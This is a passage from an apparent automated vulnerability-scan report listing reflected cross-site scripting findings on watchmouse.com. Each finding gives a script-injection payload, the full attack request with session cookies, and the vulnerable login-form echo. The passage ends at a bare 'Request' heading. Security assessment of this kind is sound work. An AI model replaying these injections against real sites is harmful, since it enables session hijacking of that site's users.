GET /fra1291"><script>alert(1)</script>630ae9a337e/ HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:21 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-31c63956f37c81d71d24d7e0416b8bf7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/fra1291"><script>alert(1)</script>630ae9a337e/" method="post">
...[SNIP]...

1.267. http://www.watchmouse.com/fr/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c03"><script>alert(1)</script>df6e6da6b47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/?75c03"><script>alert(1)</script>df6e6da6b47=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:17 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-2d11a1b996e01ca2a9d6d644907ba6f3"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/?75c03"><script>alert(1)</script>df6e6da6b47=1" method="post">
...[SNIP]...

1.268. http://www.watchmouse.com/fr/feature/public-status-page.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/feature/public-status-page.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6190c"><script>alert(1)</script>eec7a902b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fr6190c"><script>alert(1)</script>eec7a902b5/feature/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:00 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f6acb9ac00e8013f53a636ce456c4db9"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/fr6190c"><script>alert(1)</script>eec7a902b5/feature/public-status-page.html" method="post">
...[SNIP]...

1.269. http://www.watchmouse.com/fr/feature/public-status-page.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/feature/public-status-page.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66edf"><script>alert(1)</script>45eca1981d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/feature66edf"><script>alert(1)</script>45eca1981d1/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:07 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-8efe6f809bd26933168e0ec812f4ee50"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/feature66edf"><script>alert(1)</script>45eca1981d1/public-status-page.html" method="post">
...[SNIP]...

1.270. http://www.watchmouse.com/fr/feature/public-status-page.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/feature/public-status-page.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39421"><script>alert(1)</script>6105484ac02 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/feature/public-status-page.html39421"><script>alert(1)</script>6105484ac02 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-ef9ed640b33a089b2db418c8c9bfd342"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/feature/public-status-page.html39421"><script>alert(1)</script>6105484ac02" method="post">
...[SNIP]...

1.271. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3aaf"><script>alert(1)</script>b57c476554f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /frc3aaf"><script>alert(1)</script>b57c476554f/feature/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-84df100d59952cfec952573fa14e96fe"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/frc3aaf"><script>alert(1)</script>b57c476554f/feature/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.272. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9584a"><script>alert(1)</script>50ff984e50c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/feature9584a"><script>alert(1)</script>50ff984e50c/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-18071240ca507f19649141ff12cf18c5"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/feature9584a"><script>alert(1)</script>50ff984e50c/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.273. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ac2f"><script>alert(1)</script>9c27d6a2c4f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/feature/transaction-monitoring-web-application-testing.html8ac2f"><script>alert(1)</script>9c27d6a2c4f HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:00 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-038f2880e9e815a8e39470a1faaeb92b"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html8ac2f"><script>alert(1)</script>9c27d6a2c4f" method="post">
...[SNIP]...

1.274. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/feature/transaction-monitoring-web-application-testing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fa4d"><script>alert(1)</script>10bfb984279 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/feature/transaction-monitoring-web-application-testing.html?8fa4d"><script>alert(1)</script>10bfb984279=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-ecb86086049dc0cec5c4cccbe2764886"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="/fr/feature/transaction-monitoring-web-application-testing.html?8fa4d"><script>alert(1)</script>10bfb984279=1" method="post">
...[SNIP]...

1.275. http://www.watchmouse.com/fr/learn_more.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/learn_more.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a1a4"><script>alert(1)</script>c0f84162fa5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fr8a1a4"><script>alert(1)</script>c0f84162fa5/learn_more.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:55 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-762d521553a57e587d807a583139a2db"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/fr8a1a4"><script>alert(1)</script>c0f84162fa5/learn_more.php" method="post">
...[SNIP]...

1.276. http://www.watchmouse.com/fr/learn_more.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/learn_more.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38ae"><script>alert(1)</script>3996de4c4ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/learn_more.phpb38ae"><script>alert(1)</script>3996de4c4ee HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-1deabc1eff11deab31ac7e37c1a32582"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/learn_more.phpb38ae"><script>alert(1)</script>3996de4c4ee" method="post">
...[SNIP]...

1.277. http://www.watchmouse.com/fr/learn_more.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/learn_more.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dec2"><script>alert(1)</script>06ec13112a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/learn_more.php?9dec2"><script>alert(1)</script>06ec13112a9=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:44 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 12:08:45 GMT
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/learn_more.php?9dec2"><script>alert(1)</script>06ec13112a9=1" method="post">
...[SNIP]...

1.278. http://www.watchmouse.com/fr/plans_price.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/plans_price.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be5b"><script>alert(1)</script>540718cc860 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fr7be5b"><script>alert(1)</script>540718cc860/plans_price.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:39 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-759719879a47ce6d5e21332f64679a8e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/fr7be5b"><script>alert(1)</script>540718cc860/plans_price.php" method="post">
...[SNIP]...

1.279. http://www.watchmouse.com/fr/plans_price.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/plans_price.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19e0b"><script>alert(1)</script>6b17afa84b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/plans_price.php19e0b"><script>alert(1)</script>6b17afa84b5 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:43 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-db3d563554ac0e2e4e6058e2a7f097e8"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/plans_price.php19e0b"><script>alert(1)</script>6b17afa84b5" method="post">
...[SNIP]...

1.280. http://www.watchmouse.com/fr/plans_price.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/plans_price.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 921a1"><script>alert(1)</script>8cd8928a867 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

